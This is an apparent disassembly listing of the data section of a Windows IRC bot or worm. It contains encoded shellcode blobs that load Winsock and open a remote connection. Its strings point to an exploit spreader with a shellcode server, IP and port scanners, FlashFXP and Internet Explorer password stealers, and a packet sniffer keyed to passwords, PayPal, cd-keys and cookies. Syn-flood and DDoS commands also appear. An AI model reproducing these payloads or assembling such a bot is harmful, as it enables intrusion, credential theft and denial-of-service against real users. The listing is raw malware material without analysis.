dword_41C964 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+36�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 6AEC8B00h, 55544310h, 7232BA53h
dd 0D6FF1979h, 27D8166h, 0ED751111h, 22047D81h, 75222222h
dd 2B450E4h, 0BA535550h, 0E2605800h, 7D81D6FFh, 20EC8300h
dd 0BFEA758Bh, 0
dd 0E5FFh
dword_41CA18 dd 8B20EC83h, 45D89ECh, 81007D89h, 200ECh, 14658900h, 8B64DB33h
; DATA XREF: sub_412720+71�o
dd 408B3043h, 1C708B0Ch, 8788BADh, 0E8087D89h, 45h, 5F8B5653h
dd 3B5C8B3Ch, 53DF0378h, 3205B8Bh, 0C38353DFh, 3338B04h
dd 0ACC933F7h, 0C1C1C832h, 75C08405h, 75CA2BF6h, 0D82B58E9h
dd 35EEBD1h, 0DF03245Eh, 8B0B8B66h, 0DF031C5Eh, 38B048Bh
dd 0FF5B5EC7h, 33685EE0h, 68000032h, 5F327377h, 6E92BA54h
dd 0D6FF8404h, 8B0C4589h, 46A53F8h, 475FF55h, 669000BAh
dd 83D6FFE0h, 850F04F8h, 0C5h, 0E8087D8Bh, 0Dh, 3 dup(0)
dd 18458F00h, 6A026A53h, 68535301h, 0C0000000h, 0BA1875FFh
dd 5C6BD33Dh, 4589D6FFh, 840F401Ch, 8Dh, 330C7D8Bh, 2B450C0h
dd 1475FF50h, 0BA0475FFh, 0E2605800h, 7D8BD6FFh, 74C08508h
dd 41C88B1Eh, 8D535774h, 5051104Dh, 0FF1475FFh, 0B9BA1C75h
dd 0FFCBF5BEh, 74C085D6h, 0FFC5EB40h, 5CBA1C75h, 0FF9DC593h
dd 58446AD6h, 0FC8BE02Bh, 33ABD78Bh, 59106AC0h, 8BFDE2ABh
dd 5252087Dh, 50505050h, 0FF505050h, 2CBA1875h, 0FF2694F1h
dd 0C7FE58D6h, 1BA5053h, 0FFDE34D6h, 1C75FFD6h, 0C5935CBAh
dd 0FFD6FF9Dh, 3DBA1875h, 0FF27CF53h, 0C7D8BD6h, 0BA0475FFh
dd 7315685h, 7D8BD6FFh, 46BABA08h, 0D6FFC10Ch
db 0
byte_41CB95 db 0E3h ; DATA XREF: sub_4125DF+CF�r
; sub_4125DF+E4�w
align 4
dword_41CB98 dd 4113E68Bh ; DATA XREF: sub_4125DF+60�r
; sub_4125DF+75�w
align 10h
off_41CBA0 dd offset dword_41CC4C ; DATA XREF: sub_4127D0+77�r
dd offset aBg ; "ÓÞƒ"
dd 0
dd offset dword_41CC2C
dd offset aOa_0 ; "×׎€"
align 8
dd offset dword_41CC08
dd offset aDvi ; "ÓÖ„‚©"
dd 0
dd offset dword_41CBE8
dd offset aPa ; "ÚÖ€"
dd 4 dup(0)
aPa db 'ÚÖ€',0 ; DATA XREF: .data:0041CBC8�o
; .data:0041DA90�o
align 8
dword_41CBE8 dd 0DB999E9Ah, 0D5ABC9FCh, 0BEB1F3E6h, 2 dup(0) ; DATA XREF: .data:0041CBC4�o
; .data:0041DA8C�o
aDvi db 'ÓÖ„‚©',0 ; DATA XREF: .data:0041CBBC�o
; .data:0041DA84�o
align 8
dword_41CC08 dd 0DE999E9Ah, 0DFA09EFCh, 0FDA4EAACh, 0DE91BB92h, 2 dup(0)
; DATA XREF: .data:0041CBB8�o
; .data:0041DA80�o
aOa_0 db '×׎€',0 ; DATA XREF: .data:0041CBB0�o
; .data:0041DA78�o
align 4
dd 0
dword_41CC2C dd 0C3999E9Ah, 0DBBA96ECh, 0BAF0FDA9h, 98B395h, 0
; DATA XREF: .data:0041CBAC�o
; .data:0041DA74�o
aBg db 'ÓÞƒ',0 ; DATA XREF: .data:0041CBA4�o
; .data:off_41DA6C�o
align 4
dd 0
dword_41CC4C dd 0D5999E9Ah, 0CCAB8EF3h, 0B6ACF5A0h, 0CB9EB7D5h, 2 dup(0)
; DATA XREF: .data:off_41CBA0�o
; .data:off_41DA68�o
dword_41CC64 dd 72h ; DATA XREF: sub_412A3A:loc_412B93�o
dword_41CC68 dd 62h ; DATA XREF: sub_412BC9:loc_412D11�o
dword_41CC6C dd 63h ; DATA XREF: .text:loc_412DC8�o
dword_41CC70 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: .text:00412E68�o
dd 6C6C6568h, 65646F63h, 72657320h, 20726576h, 70206E6Fh
dd 2074726Fh, 2343003h, 2037325h, 0
dword_41CCA8 dd 6C656853h, 646F636Ch, 65732065h, 72657672h, 206E6F20h
; DATA XREF: sub_412F07+98�o
dd 74726F70h, 34300320h, 3752502h, 2, 0
aJeP db '†…Øݯ',0 ; DATA XREF: sub_41294E+3C�o
; sub_41294E+4C�o ...
align 4
dd 2 dup(0)
dd 0D3000000h, 82D5h, 3 dup(0)
db 2 dup(0)
dword_41CCF6 dd 9BAC28F6h ; DATA XREF: sub_41294E+2B�r
; sub_412FC6+31�r ...
dword_41CCFA dd 0 ; DATA XREF: sub_412FC6+57�w
; .text:00414107�r ...
off_41CCFE dd offset loc_410649 ; DATA XREF: sub_41294E+1C�r
; sub_412FC6+18�r ...
dw 3
dd 0
dd 838C0000h, 8EFCC0C3h, 0A6h, 2 dup(0)
dd 82D2D600h, 4 dup(0)
dd 0B0AEC05h, 0
dd 410B52h, 3, 10h dup(0)
aWin32 db '(Win32)',0 ; DATA XREF: sub_41308F+217�o
aUnix db '(Unix)',0 ; DATA XREF: sub_41308F+1F1�o
align 10h
aApacheU db 'Apache/%u',0 ; DATA XREF: sub_41308F+1DF�o
align 4
aApache db 'Apache',0 ; DATA XREF: sub_41308F+1B9�o
align 4
aMicrosoftIisU_ db 'Microsoft-IIS/%u.%u',0 ; DATA XREF: sub_41308F+130�o
aMicrosoftIis db 'Microsoft-IIS',0 ; DATA XREF: sub_41308F+FC�o
align 4
aServer db 'Server:',0 ; DATA XREF: sub_41308F+7A�o
aOptionsHttp1_0 db 'OPTIONS / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41308F+B�o
db 0Dh,0Ah,0
align 4
unk_41CDE8 db 53h ; S ; DATA XREF: .text:00413A80�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 3
db 30h, 34h, 2
db 25h ; %
db 73h, 3, 2
db 3Ah ; :
db 25h, 73h, 20h
db 69h ; i
db 6Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 30h ; 0
db 2Eh, 32h, 66h
db 3
db 2, 73h, 65h
db 63h ; c
db 2Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aOpenIpSFound db 'open IP(s) found',0
align 4
dword_41CE2C dd 2343003h, 2037325h, 2073253Ah, 6F207369h, 6E6570h
; DATA XREF: .text:004139FA�o
dword_41CE40 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: .text:004137DF�o
dd 2343003h, 2037325h, 2073253Ah, 20726F66h, 2343003h
dd 2037525h, 63657320h, 28646E6Fh, 2973h
dword_41CE78 dd 6E616353h, 676E696Eh, 34300320h, 3732502h, 73253A02h
; DATA XREF: .text:004137A1�o
dd 726F6620h, 34300320h, 3752502h, 65732002h, 646E6F63h
dd 297328h
unk_41CEA4 db 53h ; S ; DATA XREF: sub_413AB0+1DC�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 69h, 6Eh, 67h
db 20h
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
db 3Ah, 25h, 73h
db 20h
db 66h, 6Fh, 72h
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aSecondSTUSU db ' second(s), t:%u s:%u',0
align 4
dword_41CEDC dd 3430032Dh, 3752502h, 41202D02h, 6D657474h, 64657470h
; DATA XREF: .text:00413FC1�o
dd 34300320h, 3752502h, 78652002h, 696F6C70h, 69746174h
dd 73286E6Fh, 6E6F2029h, 34300320h, 3752502h, 50492002h
dd 2E297328h, 0
dword_41CF20 dd 65747441h, 6974706Dh, 7420676Eh, 7865206Fh, 696F6C70h
; DATA XREF: .text:00413F63�o
dd 30032074h, 73250234h, 77200203h, 20687469h, 2343003h
dd 2037325h, 2E2E2Eh
unk_41CF50 db 2Dh ; - ; DATA XREF: .text:00413CE4�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aAttemptingTo_0 db '- Attempting to exploit IP',27h,'s in list.',0
align 10h
aAttemptingToEx db 'Attempting to exploit IP',27h,'s in list.',0 ; DATA XREF: sub_413FE7+52�o
dword_41CFA4 dd 3003203Ah, 75250234h, 202E0203h, 0 ; DATA XREF: .text:0041410D�o
aExploitStatist db 'Exploit statistics - ',0 ; DATA XREF: .text:0041407B�o
align 4
aListingExploit db 'Listing exploit statistics',0 ; DATA XREF: sub_41417D+2B�o
align 4
dword_41CFE8 dd 62616E55h, 7420656Ch, 6F63206Fh, 63656E6Eh, 6F742074h
; DATA XREF: .text:00414299�o
dd 34300320h, 3732502h, 6F702002h, 3207472h, 25023430h
dd 2E020373h, 0
dword_41D018 dd 656D6954h, 2074756Fh, 7563636Fh, 20646572h, 6C696877h
; DATA XREF: .text:00414275�o
dd 6F632065h, 63656E6Eh, 676E6974h, 206F7420h, 2343003h
dd 2037325h, 3430033Ah, 3732502h, 202E02h
dword_41D050 dd 6E6E6F43h, 65746365h, 6F742064h, 34300320h, 3732502h
; DATA XREF: .text:00414239�o
dd 30033A02h, 73250234h, 69200203h, 3003206Eh, 75250234h
dd 203736Dh, 2Eh
dword_41D080 dd 6E6E6F43h, 69746365h, 7420676Eh, 7325206Fh, 726F7020h
; DATA XREF: sub_4142BF+D8�o
dd 30032074h, 73250234h, 203h
unk_41D0A0 db 53h ; S ; DATA XREF: .text:004145D1�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 25h ; %
db 73h, 20h, 69h
db 6Eh ; n
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 30h
db 2Eh ; .
db 32h, 66h, 3
db 2
db 73h, 65h, 63h
db 2Eh ; .
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 6Fh
aPenPortSFound db 'pen port(s) found',0
align 4
dword_41D0DC dd 33A7325h, 25023430h, 20020373h, 6F207369h, 6E6570h
; DATA XREF: .text:0041456A�o
dword_41D0F0 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: .text:00414431�o
dd 70207325h, 2074726Fh, 2343003h, 2037525h, 3430032Dh
dd 3752502h, 69772002h, 3206874h, 25023430h, 20020375h
dd 6B636F73h, 73287465h, 29h
dword_41D138 dd 6E616353h, 676E696Eh, 20732520h, 74726F70h, 34300320h
; DATA XREF: sub_414600+1BE�o
dd 3752502h, 30032D02h, 75250234h, 77200203h, 20687469h
dd 2343003h, 2037525h, 636F7320h, 2874656Bh, 2973h
aYa36za48dehfrv db 'yA36zA48dEhfrvghGRg57h5UlDv3',0 ; DATA XREF: sub_4147E5+6�o
; sub_4147E5+C6�o
align 4
aSflashfxpSites db '%sFlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+107�o
align 4
aFlashfxpSites_ db '\FlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+B6�o
aProgramfiles db 'ProgramFiles',0 ; DATA XREF: sub_4148CE+AB�o
align 10h
aSites_dat db 'sites.dat',0 ; DATA XREF: sub_4148CE:loc_414945�o
align 4
aFlashfxp_exe1 db 'FlashFXP.exe %1',0 ; DATA XREF: sub_4148CE+57�o
aSoftwareClasse db 'SOFTWARE\Classes\Applications\FlashFXP.exe\shell\open\command',0
; DATA XREF: sub_4148CE+15�o
align 4
unk_41D22C db 2Dh ; - ; DATA XREF: .text:00414E82�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 2Fh, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aFlashfxpPass_0 db 'FlashFXP password(s).',0
align 4
dword_41D268 dd 2343003h, 2037525h ; DATA XREF: .text:00414DE2�o
a_FlashfxpFtpSS db '. FlashFXP - ftp://%s:%s@%s:%s - %s',0
aPass127s db 0Dh,0Ah ; DATA XREF: .text:00414D70�o
db 'Pass=%127s',0Dh,0Ah,0
align 4
aUser127s db 0Dh,0Ah ; DATA XREF: .text:00414D56�o
db 'User=%127s',0Dh,0Ah,0
align 4
aPort127s db 0Dh,0Ah ; DATA XREF: .text:00414D3C�o
db 'Port=%127s',0Dh,0Ah,0
align 4
aIp127s db 0Dh,0Ah ; DATA XREF: .text:00414D22�o
db 'IP=%127s',0Dh,0Ah,0
align 4
asc_41D2D4 db '[%[^]]]',0Dh,0Ah,0 ; DATA XREF: .text:00414D08�o
align 10h
aPass db 0Dh,0Ah ; DATA XREF: .text:00414C12�o
db 'Pass=',0
aUser db 0Dh,0Ah ; DATA XREF: .text:00414BFA�o
db 'User=',0
aPort db 0Dh,0Ah ; DATA XREF: .text:00414BE2�o
db 'Port=',0
aIp db 0Dh,0Ah ; DATA XREF: .text:00414BCA�o
db 'IP=',0
align 10h
asc_41D300 db 0Dh,0Ah ; DATA XREF: .text:loc_414BA6�o
db 0Dh,0Ah
db '[',0
align 4
unk_41D308 db 2Dh ; - ; DATA XREF: .text:00414A73�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingFlashfx db '- Listing FlashFXP passwords',0
align 10h
aFlashfxpPasswo db 'FlashFXP password stealer',0 ; DATA XREF: sub_414EB0+2B�o
align 4
dd 3430032Dh, 3752502h, 4C202D02h, 65747369h, 30032064h
dd 75250234h, 69200203h, 7265746Eh, 2074656Eh, 6C707865h
dd 7265726Fh, 73617020h, 726F7773h, 29732864h, 2Eh, 2343003h
dd 2037525h, 4549202Eh, 7475413Ah, 6D6F436Fh, 74656C70h
dd 61502065h, 6F777373h, 20736472h, 6953202Dh, 203A6574h
dd 2343003h, 2037325h, 614E202Eh, 203A656Dh, 2343003h
dd 2037325h, 6150202Eh, 6F777373h, 203A6472h, 2343003h
dd 2037325h, 2Eh, 2343003h, 2037525h, 4549202Eh, 7475413Ah
dd 6F43206Fh, 656C706Dh, 66206574h, 646C6569h, 202D2073h
dd 6C656946h, 3203A64h, 25023430h, 2E020373h, 74614420h
dd 3203A61h, 25023430h, 2E020373h, 0
aHttps db 'https:/',0
aHttp_0 db 'http:/',0
align 4
aString db ':String',0
aStringindex db 'StringIndex',0
aE161255a db 'e161255a',0
align 4
dd 2343003h, 2037525h, 534D202Eh, 7845204Eh, 726F6C70h
dd 2D207265h, 4E534D20h, 3A444920h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h, 2Ch, 31383962h, 32356339h, 0
dd 2343003h, 2037525h, 4549202Eh, 7361503Ah, 726F7773h
dd 72502D64h, 6365746Fh, 20646574h, 6953202Dh, 203A6574h
dd 2343003h, 2037325h, 614E202Eh, 203A656Dh, 2343003h
dd 2037325h, 6150202Eh, 6F777373h, 203A6472h, 2343003h
dd 2037325h, 2Eh, 65376535h, 30303138h, 0
dd 2343003h, 2037525h, 754F202Eh, 6F6F6C74h, 7078456Bh
dd 73736572h, 4E202D20h, 3A656D61h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h, 64303232h, 31636335h, 0
dd 737725h, 7825h, 3430032Dh, 3752502h, 4C202D02h, 69747369h
dd 6920676Eh, 7265746Eh, 2074656Eh, 6C707865h, 7265726Fh
dd 73617020h, 726F7773h, 7364h, 0
dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh
aInternetExplor db 'Internet explorer password stealer',0 ; DATA XREF: sub_415AF0+36�o
align 4
dword_41D5CC dd 65746E49h, 74736572h, 20676E69h, 636F7270h, 65737365h
; DATA XREF: .text:00415DD7�o
dd 202D2073h, 75736956h, 43206C61h, 36202B2Bh, 3003203Ah
dd 73250234h, 202E0203h, 65726E55h, 52496C61h, 203A4443h
dd 2343003h, 2037325h, 7453202Eh, 3A6D6165h, 34300320h
dd 3732502h, 57202E02h, 646C726Fh, 20664F20h, 63726157h
dd 74666172h, 3003203Ah, 73250234h, 202E0203h, 716E6F43h
dd 20726575h, 696C6E4Fh, 203A656Eh, 2343003h, 2037325h
dd 2Eh
aSoftwareValveS db 'Software\Valve\Steam',0 ; DATA XREF: .text:00415CA9�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++',0
; DATA XREF: .text:00415C6A�o
align 4
aConquer db '[Conquer]',0 ; DATA XREF: .text:loc_415C2F�o
align 10h
aWorldOfWarcraf db 'World Of Warcraft',0 ; DATA XREF: .text:loc_415C0E�o
align 4
aUnreal3 db 'Unreal3',0 ; DATA XREF: .text:00415BEC�o
aListingInteres db 'Listing interesting processes',0 ; DATA XREF: sub_415DFD+2B�o
align 4
off_41D6FC dd offset aUser_0 ; DATA XREF: sub_415EB7+32�o
; "user "
dd offset aUnknown_1 ; "unknown "
dd offset aPass_1 ; "pass "
dd offset aMailpass ; "MailPass "
dd offset aOper ; "oper "
dd 0
dd offset aIdentify ; "identify "
dd 0
dd offset aAuth ; " :auth "
dd 0
dd offset aPasswd_0 ; "passwd="
dd 0
dd offset aUsername_0 ; "username="
dd 0
dd offset aPassword_0 ; "password="
dd 0
dd offset aLogin_1 ; "login="
dd 0
dd offset aPass_2 ; "pass="
dd 0
dd offset aPw ; "pw="
dd 2 dup(0)
off_41D758 dd offset aLogin ; DATA XREF: sub_415EB7+54�o
; "login "
align 10h
dd offset aSxt ; "sxt "
align 8
dd offset aAuth_0 ; "auth "
align 10h
dd offset aPasswort ; "passwort "
align 8
dd offset aCdkey ; "cdkey"
align 10h
dd offset aCdKey ; "cd-key"
align 8
dd offset aCdKey_0 ; "cd key"
align 10h
dd offset aPassword ; "password"
align 8
dd offset aPaypal_com ; "paypal.com"
align 10h
dd offset aPaypal ; "paypal"
align 8
dd offset aIrcOperator ; "irc operator"
align 10h
dd offset aLP ; "l/p"
align 8
dd offset aSsh1_5 ; "SSH-1.5"
align 10h
dd offset aSsh1_99 ; "SSH-1.99"
dd 2 dup(0)
off_41D7CC dd offset aSetCookie ; DATA XREF: sub_415EB7+76�o
; "Set-Cookie:"
dd 0
dd offset aSyn ; "syn"
dd 0
dd offset aFlood ; "flood "
dd 0
dd offset aClone ; "clone "
dd 0
dd offset aServU ; "serv-u"
dd 0
dd offset aServU_0 ; "serv u"
dd 0
dd offset aServu ; "servu"
dd 0
dd offset aDdos ; "ddos"
align 10h
off_41D810 dd offset aPrivmsg_0 ; DATA XREF: sub_415EB7+98�o
; "PRIVMSG "
align 8
dd offset aNotice_0 ; "NOTICE "
align 10h
dd offset aTopic ; "TOPIC "
align 8
dd offset aJoin_0 ; "JOIN "
align 10h
dd offset aPart ; "PART "
align 8
dd offset aQuit ; "QUIT "
dd 2 dup(0)
aQuit db 'QUIT ',0 ; DATA XREF: .data:0041D838�o
align 4
aPart db 'PART ',0 ; DATA XREF: .data:0041D830�o
align 4
aJoin_0 db 'JOIN ',0 ; DATA XREF: .data:0041D828�o
align 4
aTopic db 'TOPIC ',0 ; DATA XREF: .data:0041D820�o
align 4
aNotice_0 db 'NOTICE ',0 ; DATA XREF: .data:0041D818�o
aPrivmsg_0 db 'PRIVMSG ',0 ; DATA XREF: .data:off_41D810�o
align 4
aDdos db 'ddos',0 ; DATA XREF: .data:0041D804�o
align 10h
aServu db 'servu',0 ; DATA XREF: .data:0041D7FC�o
align 4
aServU_0 db 'serv u',0 ; DATA XREF: .data:0041D7F4�o
align 10h
aServU db 'serv-u',0 ; DATA XREF: .data:0041D7EC�o
align 4
aClone db 'clone ',0 ; DATA XREF: .data:0041D7E4�o
align 10h
aFlood db 'flood ',0 ; DATA XREF: .data:0041D7DC�o
align 4
aSyn db 'syn',0 ; DATA XREF: .data:0041D7D4�o
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: .data:off_41D7CC�o
aSsh1_99 db 'SSH-1.99',0 ; DATA XREF: .data:0041D7C0�o
align 4
aSsh1_5 db 'SSH-1.5',0 ; DATA XREF: .data:0041D7B8�o
aLP db 'l/p',0 ; DATA XREF: .data:0041D7B0�o
aIrcOperator db 'irc operator',0 ; DATA XREF: .data:0041D7A8�o
align 10h
aPaypal db 'paypal',0 ; DATA XREF: .data:0041D7A0�o
align 4
aPaypal_com db 'paypal.com',0 ; DATA XREF: .data:0041D798�o
align 4
aCdKey_0 db 'cd key',0 ; DATA XREF: .data:0041D788�o
align 4
aCdKey db 'cd-key',0 ; DATA XREF: .data:0041D780�o
align 4
aCdkey db 'cdkey',0 ; DATA XREF: .data:0041D778�o
align 4
aPasswort db 'passwort ',0 ; DATA XREF: .data:0041D770�o
align 4
aAuth_0 db 'auth ',0 ; DATA XREF: .data:0041D768�o
align 10h
aSxt db 'sxt ',0 ; DATA XREF: .data:0041D760�o
align 4
aLogin db 'login ',0 ; DATA XREF: .data:off_41D758�o
align 10h
aPw db 'pw=',0 ; DATA XREF: .data:0041D74C�o
aPass_2 db 'pass=',0 ; DATA XREF: .data:0041D744�o
align 4
aLogin_1 db 'login=',0 ; DATA XREF: .data:0041D73C�o
align 4
aPassword_0 db 'password=',0 ; DATA XREF: .data:0041D734�o
align 10h
aUsername_0 db 'username=',0 ; DATA XREF: .data:0041D72C�o
align 4
aPasswd_0 db 'passwd=',0 ; DATA XREF: .data:0041D724�o
aAuth db ' :auth ',0 ; DATA XREF: .data:0041D71C�o
aIdentify db 'identify ',0 ; DATA XREF: .data:0041D714�o
align 4
aOper db 'oper ',0 ; DATA XREF: .data:0041D70C�o
align 10h
aMailpass db 'MailPass ',0 ; DATA XREF: .data:0041D708�o
align 4
aPass_1 db 'pass ',0 ; DATA XREF: .data:0041D704�o
align 4
aUnknown_1 db 'unknown ',0 ; DATA XREF: .data:0041D700�o
align 10h
aUser_0 db 'user ',0 ; DATA XREF: .data:off_41D6FC�o
align 4
dword_41D9A8 dd 70737553h, 6F696369h, 70207375h, 656B6361h, 72662074h
; DATA XREF: .text:00416537�o
dd 3206D6Fh, 25023430h, 3A020373h, 2343003h, 2037525h
dd 73253E2Dh, 2075253Ah, 0
unk_41D9DC db 2Dh ; - ; DATA XREF: .text:0041610F�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 65h ; e
db 76h, 65h, 6Ch
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aPacketSnifferR db ' packet sniffer running',0
align 10h
dword_41DA10 dd 6576654Ch, 3003206Ch, 75250234h, 70200203h, 656B6361h
; DATA XREF: sub_41665C+8E�o
dd 6E732074h, 65666669h, 72h, 41DA34h, 0DCD88992h, 0CEBA94B3h
dd 0B4ACFFE6h, 2 dup(0)
dword_41DA48 dd 0A1C21D0Eh ; DATA XREF: sub_40A9CF+843�r
; .text:00416845�r ...
dword_41DA4C dd 0D6AF099Eh ; DATA XREF: .text:0041683D�r
dword_41DA50 dd 0ED38F9D8h ; DATA XREF: .text:00416832�r
dword_41DA54 dd 5D58CED8h ; DATA XREF: .text:0041682C�r
dd 0
off_41DA5C dd offset dword_41DD44 ; DATA XREF: sub_40E618+1C3�r
; sub_40E618+1D5�r ...
dd 2 dup(0)
off_41DA68 dd offset dword_41CC4C ; DATA XREF: sub_40A9CF+7B3�r
; sub_40CF2F+82�r ...
off_41DA6C dd offset aBg ; DATA XREF: sub_40CF2F+B8�r
; "ÓÞƒ"
dword_41DA70 dd 0 ; DATA XREF: sub_40CF2F+D0�r
; sub_40CF2F+DF�r
dd offset dword_41CC2C
dd offset aOa_0 ; "×׎€"
align 10h
dd offset dword_41CC08
dd offset aDvi ; "ÓÖ„‚©"
dd 0
dd offset dword_41CBE8
dd offset aPa ; "ÚÖ€"
dd 4 dup(0)
dword_41DAA4 dd 8F88D9DDh, 81F1C5A2h, 2 dup(0) ; DATA XREF: sub_40D043:loc_40D31F�o
; sub_40D871:loc_40DCB8�o
aLast db '#last',0 ; DATA XREF: .text:004034CC�o
; .text:00409422�o ...
align 4
dd 1Eh dup(0)
byte_41DB34 db 0C1h ; DATA XREF: sub_40D043+28C�r
; sub_40D043+297�o
db 85h, 0D8h, 0DFh
dd 0F1h, 1Eh dup(0)
byte_41DBB4 db 0 ; DATA XREF: sub_40D043+2B3�r
; sub_40D043+2BE�o
align 4
dd 1Fh dup(0)
dword_41DC34 dd 3430032Eh, 2036202h, 0 ; DATA XREF: sub_40A9CF:loc_40C4DA�o
; sub_40D871+242�o
dword_41DC40 dd 0D3D58395h, 90FCC9F1h, 0B2FCACh, 3Eh dup(0) ; DATA XREF: sub_406A23+2E�o
; sub_406AE7+2E�o
dword_41DD44 dd 0DFDFA6C8h, 0DBA0D4F2h, 0BCh, 0 ; DATA XREF: .data:off_41DA5C�o
dd 3430032Dh, 62656402h, 2036775h
aEipHasLeftTheE db '- eip has left the endless loop for some reason...',0
align 4
aEntry db 'entry',0
align 4
aLoop db 'loop',0
align 4
aPing08x db 'PING :%08X',0 ; DATA XREF: .text:00416A54�o
align 10h
a08xX08x3x08x08 db '%08x%x%08x%3x%08x%08x',0 ; DATA XREF: .text:0041684B�o
align 10h
dword_41DDD0 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bh ; DATA XREF: .text:00416E63�o
dword_41DDE0 dd 4172BCh, 0 ; DATA XREF: .rdata:off_4172B4�o
; .rdata:00417394�o
a_?av_com_error db '.?AV_com_error@@',0
align 10h
aRa db '¼rA',0 ; DATA XREF: .rdata:off_417308�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dword_41DE18 dd 0 ; DATA XREF: sub_401856:loc_40186E�r
; sub_401856+21�r ...
dword_41DE1C dd 0 ; DATA XREF: sub_401856:loc_401883�r
; sub_401856+36�r ...
dword_41DE20 dd 0 ; DATA XREF: sub_401856:loc_401898�r
; sub_401856+4B�r ...
dword_41DE24 dd 0 ; DATA XREF: sub_401856+3�r
; sub_401856+C�r ...
dd 0
dword_41DE2C dd 0 ; DATA XREF: sub_4018AF+40�r
; sub_4018AF+62�r ...
byte_41DE30 db 0 ; DATA XREF: .text:00401B3B�o
; .text:00402A89�r ...
align 8
dword_41DE38 dd 0 ; DATA XREF: .text:00403345�r
; sub_404CBB+1B�r ...
dword_41DE3C dd 0 ; DATA XREF: .text:00403336�o
dword_41DE40 dd 77E7C706h ; DATA XREF: sub_403BD3+28�w
; sub_409C36+12�r ...
align 8
dword_41DE48 dd 71C245E0h ; DATA XREF: sub_403BD3+53�w
dword_41DE4C dd 71C243F6h ; DATA XREF: sub_403BD3+66�w
dword_41DE50 dd 71C59904h ; DATA XREF: sub_403BD3+79�w
dword_41DE54 dd 71C453F8h ; DATA XREF: sub_403BD3+8C�w
dword_41DE58 dd 71C2FA86h ; DATA XREF: sub_403BD3+9F�w
dword_41DE5C dd 71C574FAh ; DATA XREF: sub_403BD3+B2�w
dword_41DE60 dd 71C214BAh ; DATA XREF: sub_403BD3+C5�w
dword_41DE64 dd 71C4A1B4h ; DATA XREF: sub_403BD3+D8�w
dword_41DE68 dd 71C59530h ; DATA XREF: sub_403BD3+EB�w
dword_41DE6C dd 71B2ACCBh ; DATA XREF: sub_403BD3+112�w
dword_41DE70 dd 71B22C25h ; DATA XREF: sub_403BD3+125�w
dword_41DE74 dd 71B2A381h ; DATA XREF: sub_403BD3+138�w
dword_41DE78 dd 71B28D0Dh ; DATA XREF: sub_403BD3+14B�w
dword_41DE7C dd 7622A3F4h ; DATA XREF: sub_403BD3+219�w
; .text:00408C48�r ...
dword_41DE80 dd 5E0C4E7Dh ; DATA XREF: sub_403BD3+1F2�w
; sub_415AF0+4�r
dword_41DE84 dd 71AB33DFh ; DATA XREF: sub_403BD3+16C�w
; sub_403BD3+197�r ...
dword_41DE88 dd 71ABC076h ; DATA XREF: .text:0040219D�r
; sub_403BD3+17F�w ...
dword_41DE8C dd 71AB3A2Ch ; DATA XREF: sub_403BD3+192�w
; sub_403BD3+1A9�r ...
dd 101h dup(0)
dword_41E294 dd 0 ; DATA XREF: sub_4042FB+3�r
; sub_4042FB+20�o
dword_41E298 dd 0 ; DATA XREF: sub_4042FB+12�o
; sub_4042FB:loc_404327�r
align 10h
dword_41E2A0 dd 76BF1C22h ; DATA XREF: sub_405FA3+46�w
; sub_405FA3+7A�r ...
dword_41E2A4 dd 76BF1D54h ; DATA XREF: sub_405FA3+59�w
; sub_405FA3+83�r ...
dword_41E2A8 dd 76BF1E6Ch ; DATA XREF: sub_405FA3+6C�w
; sub_405FA3+8C�r ...
dword_41E2AC dd 76BF32DDh ; DATA XREF: sub_405FA3+33�w
; sub_405FA3+71�r ...
dword_41E2B0 dd 14B188h, 0FFFFFFFFh, 5 dup(0) ; DATA XREF: sub_405FA3+4�o
; sub_406041+B�o ...
byte_41E2CC db 1 ; DATA XREF: sub_405FA3+95�w
; sub_406041+16�r
align 10h
dword_41E2D0 dd 0 ; DATA XREF: sub_409226+61�w
; sub_409226+77�w ...
align 8
